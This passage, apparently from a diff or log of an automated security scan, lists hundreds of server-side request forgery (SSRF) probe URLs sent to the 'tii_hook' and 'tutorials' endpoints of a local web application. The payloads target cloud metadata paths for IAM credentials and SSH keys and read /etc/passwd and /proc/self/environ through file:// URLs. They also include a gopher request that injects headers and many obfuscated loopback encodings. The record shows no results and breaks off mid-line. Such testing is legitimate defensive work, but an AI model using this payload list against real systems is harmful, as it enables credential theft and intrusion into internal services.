`http://localhost:4200/api/tii_hook?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tii_hook?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tii_hook?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tii_hook?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tii_hook?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tii_hook?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tii_hook?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tii_hook?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/tii_hook?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235521` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235777` +- Testing: `http://localhost:4200/api/tii_hook?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=instance-data` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tii_hook?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_hook?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_hook?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_hook?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_hook?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_hook?url=0%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tutorials +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tutorials?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tutorials?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tutorials?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tutorials?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=0` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tutorials?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tutorials?url=2130706433` +- Testing: `http://localhost:4200/api/tutorials?url=017700000001` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f000001` +- Testing: `http://localhost:4200/api/tutorials?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tutorials?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tutorials?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=localtest.me` +- Testing: `http://localhost:4200/api/tutorials?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tutorials?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tutorials?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tutorials?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tutorials?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tutorials?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tutorials?url=0%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=localtest.me` +- Testing: `http://localhost:4200/api/tutorials?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tutorials?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tutorials?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tutorials?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tutorials?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tutorials?url=0` +- Testing: `http://localhost:4200/api/tutorials?url=127.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=localhost` +- Testing: `http://localhost:4200/api/tutorials?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tutorials?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tutorials?url=7F000001` +- Testing: `http://localhost:4200/api/tutorials?url=2130706433` +- Testing: `http://localhost:4200/api/tutorials?url=6425673729` +- Testing: `http://localhost:4200/api/tutorials?url=127001` +- Testing: `http://localhost:4200/api/tutorials?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tutorials?url=localtest.me` +- Testing: `http://localhost:4200/api/tutorials?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tutorials?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f000001` +- Testing: `http://localhost:4200/api/tutorials?url=017700000001` +- Testing: `http://localhost:4200/api/tutorials?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tutorials?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tutorials?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tutorials?url=2852039166` +- Testing: `http://localhost:4200/api/tutorials?url=7147006462` +- Testing: `http://localhost:4200/api/tutorials?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tutorials?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tutorials?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tutorials?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: 